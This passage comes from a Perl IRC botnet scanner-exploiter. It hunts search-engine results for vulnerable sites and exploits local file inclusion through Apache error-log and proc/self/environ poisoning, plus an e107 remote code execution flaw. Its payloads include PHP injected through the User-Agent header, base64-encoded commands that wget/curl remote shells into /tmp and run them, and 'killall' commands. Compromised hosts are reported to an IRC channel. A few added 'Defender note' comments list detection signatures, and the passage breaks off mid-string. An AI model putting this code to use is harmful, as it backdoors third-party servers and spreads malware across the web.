  1319.                         if(get_content("http://".$site.$bug.$dir."usr/local/apache/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."usr/local/apache/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "usr/local/apache/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1320.                         if(get_content("http://".$site.$bug.$dir."usr/local/apache2/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."usr/local/apache2/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "usr/local/apache2/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1321.                         if(get_content("http://".$site.$bug.$dir."apache/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."apache/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "apache/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1322.                         if(get_content("http://".$site.$bug.$dir."apache2/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."apache2/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "apache2/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1323.                         if(get_content("http://".$site.$bug.$dir."var/www/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."var/www/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/www/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1324.                         if(get_content("http://".$site.$bug.$dir."var/log/apache/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."var/log/apache/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/apache/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1325.                         if(get_content("http://".$site.$bug.$dir."var/log/apache2/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."var/log/apache2/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/apache2/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1326.                         if(get_content("http://".$site.$bug.$dir."var/log/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."var/log/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1327.                         if(get_content("http://".$site.$bug.$dir."var/log/httpd/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."var/log/httpd/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/httpd/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1328.                         if(get_content("http://".$site.$bug.$dir."opt/lampp/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."opt/lampp/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "opt/lampp/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1329.                 }
  1330.         }
  1331.         elsif ($mode eq "post") {
                        # The marker request itself is still a GET in this branch.
  1332.                 my $req = &get_content($scanner);
  1333.                 if($req =~ /0wn4g3.3u/) {
  1334.                         if(post_content("http://".$site.$bug.$dir."etc/httpd/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."etc/httpd/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "etc/httpd/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1335.                         if(post_content("http://".$site.$bug.$dir."usr/local/apache/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."usr/local/apache/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "usr/local/apache/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1336.                         if(post_content("http://".$site.$bug.$dir."usr/local/apache2/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."usr/local/apache2/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "usr/local/apache2/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1337.                         if(post_content("http://".$site.$bug.$dir."apache/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."apache/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "apache/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1338.                         if(post_content("http://".$site.$bug.$dir."apache2/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."apache2/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "apache2/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1339.                         if(post_content("http://".$site.$bug.$dir."var/www/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."var/www/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/www/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1340.                         if(post_content("http://".$site.$bug.$dir."var/log/apache/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."var/log/apache/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/apache/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1341.                         if(post_content("http://".$site.$bug.$dir."var/log/apache2/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."var/log/apache2/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/apache2/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1342.                         if(post_content("http://".$site.$bug.$dir."var/log/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."var/log/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1343.                         if(post_content("http://".$site.$bug.$dir."var/log/httpd/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."var/log/httpd/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/httpd/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1344.                         if(post_content("http://".$site.$bug.$dir."opt/lampp/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."opt/lampp/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "opt/lampp/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1345.                 }
  1346.         }
  1347. }
  1348.  
  1349. sub lfi_log_vuln_xpl() {
  1350. my ($site,$bug,$dir,$mode,$pwd,$chan,$engine) = @_;
  1351.  
  1352.         $dwa = "/<? echo '0key'; if(@fwrite(fopen('/tmp/h4rd','w'),@file_get_contents('".$botshell."'))) { echo '0wn4ge';@fwrite(fopen('/tmp/pb','w'),file_get_contents('".$injector."')); } ";
  1353.         $dwa .= "elseif(@copy('".$botshell."','/tmp/h4rd')) { echo '0wn4ge';@copy('".$injector."','/tmp/pb'); } else {  echo '0wn4ge'; } ".$b0tcmd." ?>";
  1354.  
  1355.         my $injectcode = "http://".$site.$dwa;
  1356.         if ($mode eq "get") {
  1357.                 &get_content($injectcode);
  1358.                 my $excmd = "http://".$site.$bug.$dir.$pwd;  
  1359.                 my $req = &get_content($excmd);
  1360.                 if($req =~ /0key/ && $req =~ /0wn4ge/) {
  1361.                         my $check = &get_content("http://".$site.$bug.$dir."tmp/h4rd%0000"); sleep(2);
  1362.                         if ($check =~ /0wn3d/) { $dor = "http://".$site.$bug.$dir."tmp/h4rd%0000"; &info_main($dor,$chan,$engine,$lfilogo); &get_content("http://".$site.$bug.$dir."tmp/pb%0000"); sleep(2); }
  1363.                         else { &msg("$chan","$lfilogo 12(4@0$engine12)(4@10G-LOGS12)10 http://".$site.$bug.$dir.$pwd." 12(4@0OKEE12)"); }
  1364.                 } elsif($req =~ /0key/) {
  1365.                         &msg("$chan","$lfilogo 12(4@0$engine12)(4@10G-LOGS12)10 http://".$site.$bug.$dir.$pwd." 12(4@0OKEE12)");
  1366.                 } else {
  1367.                         &msg("$chan", "$lfilogo 12(4@0$engine12)(4@10G-LOGS12)10 http://".$site.$bug.$dir.$pwd."");
  1368.                 }
  1369.         }
  1370.         elsif ($mode eq "post") {
  1371.                 &post_content($injectcode);
  1372.                 my $excmd = "http://".$site.$bug.$dir.$pwd;  
  1373.                 my $req = &post_content($excmd);
  1374.                 if($req =~ /0key/ && $req =~ /0wn4ge/) {
  1375.                         my $check = &post_content("http://".$site.$bug.$dir."tmp/h4rd%0000"); sleep(2);
  1376.                         if ($check =~ /0wn3d/) { $dor = "http://".$site.$bug.$dir."tmp/h4rd%0000"; &info_main($dor,$chan,$engine,$lfilogo); &post_content("http://".$site.$bug.$dir."tmp/pb%0000"); sleep(2); }
  1377.                         else { &msg("$chan","$lfilogo 12(4@0$engine12)(4@10P-LOGS12)10 http://".$site.$bug.$dir.$pwd." 12(4@0OKEE12)"); }
  1378.                 } elsif($req =~ /0key/) {
  1379.                         &msg("$chan","$lfilogo 12(4@0$engine12)(4@10P-LOGS12)10 http://".$site.$bug.$dir.$pwd." 12(4@0OKEE12)");
  1380.                 } else {
  1381.                         &msg("$chan", "$lfilogo 12(4@0$engine12)(4@10P-LOGS12)10 http://".$site.$bug.$dir.$pwd."");
  1382.                 }
  1383.         }
  1384. }
  1385.  
  1386. sub lfi_env() {
        # Tests whether proc/self/environ can be read through the include
        # parameter. The URL is fetched twice and must contain both
        # "DOCUMENT_ROOT=/" and "HTTP_USER_AGENT" before lfi_env_vuln_xpl()
        # is called. $mode selects get_content() or post_content().
        # $pwd carries no "my", so it is not lexical to this sub.
        # Defender note: traversal requests ending in proc/self/environ are
        # the signature. Because the environment block echoes request headers
        # such as User-Agent, a readable environ lets header content reach
        # the include. Alert on any such request, not only on successful ones.
  1387. my ($site,$bug,$dir,$mode,$chan,$engine) = @_;
  1388.         if ($mode eq "get") {
  1389.                 if(get_content("http://".$site.$bug.$dir."proc/self/environ%0000") =~ /DOCUMENT_ROOT=\// && get_content("http://".$site.$bug.$dir."proc/self/environ%0000") =~ /HTTP_USER_AGENT/) { $pwd = "proc/self/environ%0000"; &lfi_env_vuln_xpl($site,$bug,$dir,$pwd,$chan,$engine); }
  1390.         }
  1391.         elsif ($mode eq "post") {
  1392.                 if(post_content("http://".$site.$bug.$dir."proc/self/environ%0000") =~ /DOCUMENT_ROOT=\// && post_content("http://".$site.$bug.$dir."proc/self/environ%0000") =~ /HTTP_USER_AGENT/) { $pwd = "proc/self/environ%0000"; &lfi_env_vuln_xpl($site,$bug,$dir,$pwd,$chan,$engine); }
  1393.         }
  1394. }
  1395.  
  1396. sub lfi_env_vuln_xpl() {
  1397. my ($site,$dir,$chan,$bug,$engine) = @_;
  1398.  
  1399. my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
  1400. my $vuln = "http://".$site."13".$bug.$dir."/proc/self/environ%0000";
  1401. my $shell = "http://".$site."13".$bug.$dir."/tmp/ripper%0000";
  1402.  
  1403. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1404.     my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$botshell.'","/tmp/ripper")) { echo "SUCCESS";@copy("'.$injector.'","/tmp/dev"); }';
  1405.     my $res = lfi_env_query($test,encode_base64($code));
  1406.         &lfi_spread_query($test);
  1407.         &get_content("http://".$site.$bug.$dir."/tmp/ripper%0000");
  1408.     $res =~ s/\n//g;
  1409.     if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
  1410.         my $sys = $1;
  1411.                 $nob0dy = $2;
  1412.         &msg("$chan","$lfilogo 12(4@0$engine12)(4@8SHELL12)13 ".$shell." 12(4@8".$sys."12)  $nob0dy");sleep(2);
  1413.     }
  1414.     elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
  1415.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1416.             my $sys = $1;
  1417.                         $nob0dy = $2;
  1418.             my $upload = 'passthru("killall -9 perl; killall -9 php; wget '.$injector.' -O pb.php; fetch -O pb.php '.$injector.'; cUrl -O pb.php '.$injector.'; lynx -dump '.$injector.' pb.php; GET '.$injector.'>pb.php;  lwp-download '.$injector.' pb.php; wget '.$botshell.' -O h4rd.php; fetch -O h4rd.php '.$botshell.'; cUrl -O h4rd.php '.$botshell.'; lynx -dump '.$botshell.' h4rd.php; GET '.$botshell.'>h4rd.php; lwp-download '.$botshell.' h4rd.php*"); exec("killall -9 perl; killall -9 php; wget '.$injector.' -O pb.php; fetch -O pb.php '.$injector.'; cUrl -O pb.php '.$injector.'; lynx -dump '.$injector.' pb.php; GET '.$injector.'>pb.php;  lwp-download '.$injector.' pb.php; wget '.$botshell.' -O h4rd.php; fetch -O h4rd.php '.$botshell.'; cUrl -O h4rd.php '.$botshell.'; lynx -dump '.$botshell.' h4rd.php; GET '.$botshell.'>h4rd.php; lwp-download '.$botshell.' h4rd.php*"); system("killall -9 perl; killall -9 php; wget '.$injector.' -O pb.php; fetch -O pb.php '.$injector.'; cUrl -O pb.php '.$injector.'; lynx -dump '.$injector.' pb.php; GET '.$injector.'>pb.php;  lwp-download '.$injector.' pb.php; wget '.$botshell.' -O h4rd.php; fetch -O h4rd.php '.$botshell.'; cUrl -O h4rd.php '.$botshell.'; lynx -dump '.$botshell.' h4rd.php; GET '.$botshell.'>h4rd.php; lwp-download '.$botshell.' h4rd.php*"); shell_exec("killall -9 perl; killall -9 php; wget '.$injector.' -O pb.php; fetch -O pb.php '.$injector.'; cUrl -O pb.php '.$injector.'; lynx -dump '.$injector.' pb.php; GET '.$injector.'>pb.php;  lwp-download '.$injector.' pb.php; wget '.$botshell.' -O h4rd.php; fetch -O h4rd.php '.$botshell.'; cUrl -O h4rd.php '.$botshell.'; lynx -dump '.$botshell.' h4rd.php; GET '.$botshell.'>h4rd.php; lwp-download '.$botshell.' h4rd.php*");';
  1419.             my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
  1420.             my $check = &get_content("http://".$site.$bug.$dir."/tmp/ripper%0000"); sleep(2);
  1421.             if ($check =~ /0wn3d/) {
  1422.                                 &msg("$chan","$lfilogo 12(4@0$engine12)(4@8SHELL12)13 $shell 12(4@8$sys12)  $nob0dy");sleep(2);
  1423.                                 &msg("$admin","$lfilogo 12(4@0$engine12)(4@8SHELL12)13 $shell 12(4@8$sys12)  $nob0dy");sleep(2);
  1424.             }  
  1425.             else {
  1426.                 &msg("$chan","$lfilogo 12(4@0$engine12)(4@7SYSTEM12)11 $vuln 12(4@7$sys12)  $nob0dy");sleep(2);
  1427.             }
  1428.             } exit; }
  1429.             }
  1430.             else { &msg("$chan","$lfilogo 12(4@0$engine12)(4@9ENVIRON12)11 $vuln"); }
  1431.                
  1432.         } exit; } sleep(2);
  1433. }
  1434. sub lfi_env_query() {
            # Sends one GET to $url with a crafted User-Agent header and returns
            # the response body. The header is a PHP open tag followed by
            # eval(base64_decode(<$code>)), an include of $injector, and $b0tcmd.
            # $injector and $b0tcmd are read from outside this sub. The request
            # timeout is 7 seconds.
            # Defender note: a User-Agent that starts with "<?" or contains
            # "base64_decode(" is never legitimate browser traffic. It is a
            # cheap, high-confidence match for WAF rules and log searches.
  1435.     my ($url,$code) = @_;
  1436.     my $ua = LWP::UserAgent->new(agent => "<? eval(base64_decode('".$code."')); include('".$injector."'); ".$b0tcmd." ?>");
  1437.     $ua->timeout(7);
  1438.     my $req = HTTP::Request->new(GET => $url);
  1439.     my $res = $ua->request($req);
  1440.     return $res->content;
  1441. }
  1442.  
  1443. sub lfi_spread_query() {
  1444.     my $url = $_[0];
  1445.     my $code = "ZXhlYygnY2QgL3RtcDsgd2dldCAiLiRpbmplY3Rvci4iIC1PIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocDsgZmV0Y2ggLU8gcGIucGhwICIuJGluamVjdG9yLiI7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiI7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx5bnggLWR1bXAgIi4kaW5qZWN0b3IuIiBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IEdFVCAiLiRpbmplY3Rvci4iPnBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocDsgbHdwLWRvd25sb2FkICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwJyk7IHNoZWxsX2V4ZWMoJ2NkIC90bXA7IHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBjVXJsIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx3cC1kb3dubG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocCcpOyBzeXN0ZW0oJ2NkIC90bXA7IHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBjVXJsIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx3cC1kb3dubG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocCcpOyAgcGFzc3RocnUoJ2NkIC90bXA7IHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBjVXJsIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx3cC1kb3du
bG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocCcpOw==";
  1446.     my $ua = LWP::UserAgent->new(agent => "<? eval(base64_decode('".encode_base64($code)."')); include('".$injector."'); ".$b0tcmd." ?>");
  1447.     $ua->timeout(7);
  1448.     my $req = HTTP::Request->new(GET => $url);
  1449.     my $res = $ua->request($req);
  1450. }
  1451.  
  1452. ######################## e107
  1453. sub e107() {
  1454.         my ($chan,$bug,$dork,$engine) = @_;
  1455.     my $count = 0;
  1456.     my @list = &search_engine($chan,$bug,$dork,$engine,$e107logo);
  1457.     my $num = scalar(@list);
  1458.     if ($num > 0) {
  1459.         foreach my $site (@list) {
  1460.             $count++;
  1461.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$e107logo 12(4@0$engine12) 10==14F10=15I10=0N10=0I10=15S10=14H10== "); } }
  1462.             my $test = "http://".$site.$bug;
  1463.             my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
  1464.             my $html = &e107_rce_query($test,$code);
  1465.             if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
  1466.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1467.                     my $sys = $1;
  1468.                     my $upload = 'if(@copy("'.$injector.'","pb.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","h4rd.php"); } elseif(@copy("'.$injector.'","e107_themes/pb.php")) { echo "stun_dthem";@copy("'.$botshell.'","e107_themes/h4rd.php"); } elseif(@copy("'.$injector.'","e107_plugins/pb.php")) { echo "stun_dplug";@copy("'.$botshell.'","e107_plugins/h4rd.php"); } elseif(@copy("'.$injector.'","e107_images/pb.php")) { echo "stun_dima";@copy("'.$botshell.'","e107_images/h4rd.php");} eval(include("'.$injector.'")); '.$b0tcmd.'';
  1469.                     my $res = &e107_rce_query($test,encode_base64($upload));
  1470.                     if ($res =~ /c0liSUKSESc0li/) {
  1471.                                                 &get_content("http://".$site."pb.php"); my $dor = "http://".$site."h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1472.                                         }
  1473.                     elsif ($res =~ /stun_dthem/) {
  1474.                                                 &get_content("http://".$site."e107_themes/pb.php"); my $dor = "http://".$site."e107_themes/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1475.                                         }
  1476.                     elsif ($res =~ /stun_dplug/) {
  1477.                                                 &get_content("http://".$site."e107_plugins/pb.php"); my $dor = "http://".$site."e107_plugins/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1478.                                         }
  1479.                     elsif ($res =~ /stun_dima/) {
  1480.                                                 &get_content("http://".$site."e107_images/pb.php"); my $dor = "http://".$site."e107_images/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1481.                                         }
  1482.                     else {
  1483.                                                 &msg("$chan","$e107logo 12(4@0$engine12)(4@7VULN12)11 ".$test." 12(4@7".$sys."12)(4@0safemode-9OFF12) ");sleep(2);
  1484.                                                 my $dor = "http://".$site."h4rd.php";
  1485.                                                 my $check = &get_content($dor); &get_content("http://".$site."pb.php");
  1486.                                                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/) {
  1487.                                                 &info_main($dor,$chan,$engine,$e107logo);
  1488.                                                 }
  1489.                                         }
  1490.                     &e107_spread_query($test);
  1491.                     sleep(2);
  1492.                 } exit; } sleep(2);
  1493.             }
  1494.             elsif ($html =~ /v0pCr3w<br>sys:(.+?)<br>/) {
  1495.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1496.                     my $sys = $1;
  1497.                     my $upload = 'if(@copy("'.$injector.'","pb.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","h4rd.php"); } elseif(@copy("'.$injector.'","e107_themes/pb.php")) { echo "stun_dthem";@copy("'.$botshell.'","e107_themes/h4rd.php"); } elseif(@copy("'.$injector.'","e107_plugins/pb.php")) { echo "stun_dplug";@copy("'.$botshell.'","e107_plugins/h4rd.php"); } elseif(@copy("'.$injector.'","e107_images/pb.php")) { echo "stun_dima";@copy("'.$botshell.'","e107_images/h4rd.php");} eval(include("'.$injector.'")); '.$b0tcmd.'';
  1498.                     my $res = &e107_rce_query($test,encode_base64($upload));
  1499.                     if ($res =~ /c0liSUKSESc0li/) {
  1500.                                                 &get_content("http://".$site."pb.php"); my $dor = "http://".$site."h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1501.                                         }
  1502.                     elsif ($res =~ /stun_dthem/) {
  1503.                                                 &get_content("http://".$site."e107_themes/pb.php"); my $dor = "http://".$site."e107_themes/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1504.                                                 }
  1505.                     elsif ($res =~ /stun_dplug/) {
  1506.                                                 &get_content("http://".$site."e107_plugins/pb.php"); my $dor = "http://".$site."e107_plugins/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1507.                                                 }
  1508.                     elsif ($res =~ /stun_dima/) {
  1509.                                                 &get_content("http://".$site."e107_images/pb.php"); my $dor = "http://".$site."e107_images/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1510.                                                 }
  1511.                     else {
  1512.                                                 &msg("$chan","$e107logo 12(4@0$engine12)(4@7VULN12)11 ".$test." 12(4@7".$sys."12)(4@0safemode-4ON12) ");sleep(2);
  1513.                                                 my $dor = "http://".$site."h4rd.php";
  1514.                                                 my $check = &get_content($dor); &get_content("http://".$site."pb.php");
  1515.                                                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/) {
  1516.                                                 &info_main($dor,$chan,$engine,$e107logo);
  1517.                                                 }
  1518.                                         }
  1519.                                 &e107_spread_query($test);
  1520.                 sleep(2); } exit; }
  1521.             }
  1522.         }
  1523.     }
  1524. }
  1525.  
  1526. sub e107_rce_query() {
  1527.     my ($url,$code) = @_;
  1528.         my $cod2 = "aWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoImNkIC90bXAgJiYgd2dldCAiLiRpbmplY3Rvci4iIC1PIHBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIHdnZXQgIi4kYm90c2hlbGwuIiAtTyBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBleGVjKCJjZCAvdG1wICYmIGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgZmV0Y2ggLU8gaDRyZC5waHAgIi4kYm90c2hlbGwuIiAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBleGVjKCJjZCAvdG1wICYmIGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBjVXJsIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAZXhlYygiY2QgL3RtcCAmJiBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgbHlueCAtZHVtcCAiLiRib3RzaGVsbC4iIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5